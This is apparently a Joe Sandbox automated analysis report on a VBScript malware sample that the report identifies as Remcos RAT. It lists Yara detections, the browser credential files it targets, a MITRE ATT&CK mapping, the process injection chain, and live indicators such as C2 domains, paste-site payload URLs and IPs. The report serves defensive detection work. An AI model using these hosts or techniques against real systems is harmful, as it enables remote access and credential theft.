                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2896720400.0000000002C1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2876508990.0000000001248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7924, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Contains functionality to steal Chrome passwords or cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data21_2_0040B21B
                        Contains functionality to steal Firefox passwords or cookies
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\21_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: \key3.db21_2_0040B335

                        Remote Access Functionality

                        barindex
                        Yara detected Remcos RAT
                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.2896720400.0000000002C1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2876508990.0000000001248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7924, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 4544, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: cmd.exe21_2_00405042

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information321
                        Scripting                        		Valid Accounts1
                        Native API                        		321
                        Scripting                        		1
                        DLL Side-Loading                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        OS Credential Dumping                        		2
                        System Time Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Web Service                        		Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts1
                        Exploitation for Client Execution                        		1
                        DLL Side-Loading                        		1
                        Bypass User Account Control                        		3
                        Obfuscated Files or Information                        		211
                        Input Capture                        		1
                        Account Discovery                        		Remote Desktop Protocol211
                        Input Capture                        		12
                        Ingress Tool Transfer                        		Exfiltration Over Bluetooth1
                        Defacement
                        Email AddressesDNS ServerDomain Accounts3
                        Command and Scripting Interpreter                        		1
                        Windows Service                        		1
                        Access Token Manipulation                        		1
                        DLL Side-Loading                        		2
                        Credentials In Files                        		1
                        System Service Discovery                        		SMB/Windows Admin Shares3
                        Clipboard Data                        		21
                        Encrypted Channel                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        Service Execution                        		Login Hook1
                        Windows Service                        		1
                        Bypass User Account Control                        		NTDS3
                        File and Directory Discovery                        		Distributed Component Object ModelInput Capture1
                        Non-Standard Port                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts2
                        PowerShell                        		Network Logon Script322
                        Process Injection                        		1
                        Masquerading                        		LSA Secrets33
                        System Information Discovery                        		SSHKeylogging2
                        Non-Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                        Virtualization/Sandbox Evasion                        		Cached Domain Credentials21
                        Security Software Discovery                        		VNCGUI Input Capture113
                        Application Layer Protocol                        		Data Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Access Token Manipulation                        		DCSync21
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job322
                        Process Injection                        		Proc Filesystem3
                        Process Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                        Application Window Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                        System Owner/User Discovery                        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576754 Sample: BBVA S.A..vbs Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 46 paste.ee 2->46 48 rem.pushswroller.eu 2->48 50 3 other IPs or domains 2->50 64 Suricata IDS alerts for network traffic 2->64 66 Found malware configuration 2->66 68 Malicious sample detected (through community Yara rule) 2->68 72 14 other signatures 2->72 9 wscript.exe 15 2->9         started        13 wscript.exe 14 2->13         started        signatures3 70 Connects to a pastebin service (likely for C&C) 46->70 process4 dnsIp5 56 paste.rs 45.63.94.214, 443, 49713, 49790 AS-CHOOPAUS United States 9->56 84 VBScript performs obfuscated calls to suspicious functions 9->84 86 Suspicious powershell command line found 9->86 88 Wscript starts Powershell (via cmd or directly) 9->88 92 2 other signatures 9->92 15 powershell.exe 14 17 9->15         started        90 System process connects to network (likely due to code injection or exploit) 13->90 19 powershell.exe 13->19         started        signatures6 process7 dnsIp8 58 paste.ee 104.21.84.67, 443, 49784, 49880 CLOUDFLARENETUS United States 15->58 60 Writes to foreign memory regions 15->60 62 Injects a PE file into a foreign processes 15->62 21 aspnet_compiler.exe 6 17 15->21         started        26 cmd.exe 2 15->26         started        28 conhost.exe 15->28         started        30 conhost.exe 19->30         started        32 aspnet_compiler.exe 19->32         started        34 aspnet_compiler.exe 19->34         started        signatures9 process10 dnsIp11 52 rem.pushswroller.eu 45.80.158.30, 23101, 49795, 49829 UK2NET-ASGB Netherlands 21->52 54 geoplugin.net 178.237.33.50, 49803, 80 ATOM86-ASATOM86NL Netherlands 21->54 40 C:\Users\user\...\paqxrhksjzifkagvqwpv.vbs, data 21->40 dropped 42 C:\ProgramData\remcos\logs.dat, data 21->42 dropped 74 Contains functionality to bypass UAC (CMSTPLUA) 21->74 76 Contains functionalty to change the wallpaper 21->76 78 Contains functionality to steal Chrome passwords or cookies 21->78 82 4 other signatures 21->82 36 wscript.exe 21->36         started        44 C:\ProgramData\haematachometer.vbs, Unicode 26->44 dropped 80 Command shell drops VBS files 26->80 38 conhost.exe 26->38         started        file12 signatures13 process14

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        BBVA S.A..vbs8%ReversingLabsWin32.Trojan.Generic

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        firewarzone.ydns.eu100%Avira URL Cloudmalware
                        sun.drillmmcsnk.eu100%Avira URL Cloudmalware
                        https://paste.rs/LDDIb0%Avira URL Cloudsafe
                        rem.pushswroller.eu100%Avira URL Cloudmalware
                        https://paste.rs/LDDIb80%Avira URL Cloudsafe
                        https://paste.rs/LDDIbt;0%Avira URL Cloudsafe
                        https://paste.rs/LDDIbs0%Avira URL Cloudsafe
                        https://paste.rs/0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        paste.rs
                        		45.63.94.214
                        		truefalse
                          		high
                          paste.ee
                          		104.21.84.67
                          		truefalse
                            		high
                            rem.pushswroller.eu
                            		45.80.158.30
                            		truetrue
                              		unknown
                              geoplugin.net
                              		178.237.33.50
                              		truefalse
                                		high
                                res.cloudinary.com
                                		unknown
                                		unknownfalse
                                  		high

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://geoplugin.net/json.gpfalse
                                    		high
                                    firewarzone.ydns.eutrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    sun.drillmmcsnk.eutrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    rem.pushswroller.eutrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://paste.rs/LDDIbtrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://geoplugin.net/json.gp/Caspnet_compiler.exe, 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbswscript.exe, 0000000E.00000003.2512795164.00000230DF5DD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2479709616.00000230DD815000.00000004.00000020.00020000.00000000.sdmp, BBVA S.A..vbs, haematachometer.vbs.11.drfalse
                                        		high
                                        https://paste.rs/wscript.exe, 0000000E.00000002.2537637767.00000230DF710000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs_wscript.exe, 00000000.00000003.2138819495.0000014C48B91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2480120754.00000230DF561000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://geoplugin.net/json.gpRaspnet_compiler.exe, 0000000F.00000002.2892055901.0000000000FB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/koswald/VBScriptfwscript.exe, 00000000.00000003.2139271062.0000014C48BA7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138790827.0000014C48B97000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://github.com/koswald/VBScripthaematachometer.vbs.11.drfalse
                                                		high
                                                https://paste.rs/LDDIb8wscript.exe, 0000000E.00000002.2529422593.00000230DD806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2525028654.00000230DD806000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2520710436.00000230DD7DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://paste.rs/LDDIbswscript.exe, 00000000.00000003.2174559674.0000014C46D2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2176015156.0000014C46D8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2176807263.0000014C46D8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175053685.0000014C46D64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2523814289.00000230DD840000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000003.2526469472.00000230DD840000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2529538333.00000230DD840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://paste.rs/LDDIbt;wscript.exe, 0000000E.00000003.2521837843.00000230DF710000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000E.00000002.2537637767.00000230DF710000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://github.com/koswald/VBScript/blob/master/SetupPerUser.mdwscript.exe, 00000000.00000003.2172256961.0000014C48C08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138399784.0000014C48BBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138503358.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139016682.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138734913.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2176246896.0000014C48C0F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174559674.0000014C46D2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2173911891.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139136981.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139348876.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139195389.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172680874.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172776501.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172464026.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2172626663.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175053685.0000014C46DA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175277697.0000014C48CA1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2138837387.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2174349568.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2139271062.0000014C48C0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2175798890.0000014C46DA6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  45.80.158.30
                                                  		rem.pushswroller.euNetherlands
                                                  		13213UK2NET-ASGBtrue
                                                  45.63.94.214
                                                  		paste.rsUnited States
                                                  		20473AS-CHOOPAUSfalse
                                                  178.237.33.50
                                                  		geoplugin.netNetherlands
                                                  		8455ATOM86-ASATOM86NLfalse
                                                  104.21.84.67
                                                  		paste.eeUnited States
                                                  		13335CLOUDFLARENETUSfalse

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1576754
                                                  Start date and time:2024-12-17 14:29:09 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 6m 51s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:23
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:BBVA S.A..vbs
                                                  Detection:MAL
                                                  Classification:mal100.rans.troj.spyw.expl.evad.winVBS@19/12@5/4
                                                  EGA Information:
                                                  • Successful, ratio: 50%
                                                  HCA Information:
                                                  • Successful, ratio: 96%
                                                  • Number of executed functions: 11
                                                  • Number of non-executed functions: 205
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .vbs

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                  • Excluded IPs from analysis (whitelisted): 104.17.202.1, 104.17.201.1, 20.190.177.146, 20.103.156.88, 13.107.246.63, 2.16.158.80, 4.245.163.56, 173.222.162.64
                                                  • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, resc.cloudinary.com.cdn.cloudflare.net, ctldl.windowsupdate.com, tse1.mm.bing.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                                                  • Execution Graph export aborted for target aspnet_compiler.exe, PID 7924 because there are no executed function
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: BBVA S.A..vbs

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  08:30:07API Interceptor150x Sleep call for process: powershell.exe modified
                                                  08:31:10API Interceptor12x Sleep call for process: aspnet_compiler.exe modified
                                                  14:30:36Task SchedulerRun new task: TaskName path: wscript.exe s>C:\ProgramData\haematachometer.vbs

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  45.80.158.30173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • sws.swpushroller.eu/swsk/P4.php
                                                  Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                  • sws.swpushroller.eu/swsk/P4.php
                                                  45.63.94.214nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                    invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                      Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                        178.237.33.50Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • geoplugin.net/json.gp
                                                        Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • geoplugin.net/json.gp
                                                        Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • geoplugin.net/json.gp
                                                        givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                        • geoplugin.net/json.gp
                                                        clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                        • geoplugin.net/json.gp
                                                        7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                        • geoplugin.net/json.gp
                                                        PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                        • geoplugin.net/json.gp
                                                        requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                        • geoplugin.net/json.gp
                                                        Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                        • geoplugin.net/json.gp
                                                        x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                        • geoplugin.net/json.gp

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        rem.pushswroller.eu173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 45.80.158.30
                                                        Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                        • 45.80.158.30
                                                        paste.eegreatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                        • 172.67.187.200
                                                        seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                        • 104.21.84.67
                                                        sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                        • 172.67.187.200
                                                        createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                        • 104.21.84.67
                                                        givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                        • 104.21.84.67
                                                        clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                        • 172.67.187.200
                                                        PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                        • 104.21.84.67
                                                        NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                        • 188.114.96.6
                                                        greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                        • 104.21.84.67
                                                        goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                        • 172.67.187.200
                                                        paste.rsnicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                        • 45.63.94.214
                                                        invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                        • 45.63.94.214
                                                        Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                        • 45.63.94.214
                                                        geoplugin.netSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 178.237.33.50
                                                        Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 178.237.33.50
                                                        Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 178.237.33.50
                                                        givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                        • 178.237.33.50
                                                        clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                        • 178.237.33.50
                                                        7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                        • 178.237.33.50
                                                        x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        AS-CHOOPAUShpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                        • 45.77.249.79
                                                        DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                        • 45.77.249.79
                                                        SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                        • 45.77.249.79
                                                        file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                        • 45.77.249.79
                                                        Setup.exe (1).zipGet hashmaliciousUnknownBrowse
                                                        • 209.222.21.115
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                        • 45.77.249.79
                                                        mips.elfGet hashmaliciousUnknownBrowse
                                                        • 149.248.45.75
                                                        bot.spc.elfGet hashmaliciousMiraiBrowse
                                                        • 45.32.181.8
                                                        rebirth.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                        • 108.61.131.209
                                                        Setup.msiGet hashmaliciousUnknownBrowse
                                                        • 45.77.249.79
                                                        ATOM86-ASATOM86NLSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 178.237.33.50
                                                        Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 178.237.33.50
                                                        Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                        • 178.237.33.50
                                                        givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                        • 178.237.33.50
                                                        clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                        • 178.237.33.50
                                                        7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                        • 178.237.33.50
                                                        x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                        • 178.237.33.50
                                                        UK2NET-ASGB173378939937efea07b4bc781b0b774c712430f5494a016d81092444624b7a38c4894091d6159.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                        • 45.80.158.30
                                                        Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                        • 45.80.158.30
                                                        main_m68k.elfGet hashmaliciousMiraiBrowse
                                                        • 77.92.90.50
                                                        la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                                        • 88.202.185.180
                                                        la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                        • 46.28.54.10
                                                        173261064444feee4c05378d5cb0bdc1a536ff9f623e28d93246c641e622bd865a85d1a223699.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 45.80.158.30
                                                        Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 45.80.158.30
                                                        loligang.x86.elfGet hashmaliciousMiraiBrowse
                                                        • 80.209.188.4
                                                        ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                        • 45.80.158.23
                                                        8UUxoKYpTx.elfGet hashmaliciousMiraiBrowse
                                                        • 173.244.199.148
                                                        CLOUDFLARENETUShttps://disruptivc-dot-yamm-track.appspot.com/Redirect?ukey=1-0q8XPD2_exH3GZm9N9GPlcuW7DeTrX4WZWK6ta6DkQ-0&key=YAMMID-76523483&link=https://construction-sealants-ltd.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                                        • 162.159.128.70
                                                        file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                        • 104.21.23.76
                                                        https://www.picotech.com/download/software/sr/PicoScope6_r6_14_69.exeGet hashmaliciousUnknownBrowse
                                                        • 104.20.22.157
                                                        https://jotform-mailing.com/Get hashmaliciousUnknownBrowse
                                                        • 104.21.64.1
                                                        ugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 172.67.177.134
                                                        itLDZwgFNE.exeGet hashmaliciousFlesh StealerBrowse
                                                        • 104.16.184.241
                                                        87h216Snb7.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        • 104.21.67.152
                                                        https://sos-at-vie-1.exo.io/ilbuck/sato/process/continue-after-check-vr2.htmlGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                        • 104.17.25.14
                                                        https://www.cadbury.com@nmlr.xyz/christmas-hamperGet hashmaliciousUnknownBrowse
                                                        • 104.26.9.83
                                                        Doc_23-03-27.jsGet hashmaliciousUnknownBrowse
                                                        • 104.21.32.1

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0eugpJX5h56S.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 104.21.84.67
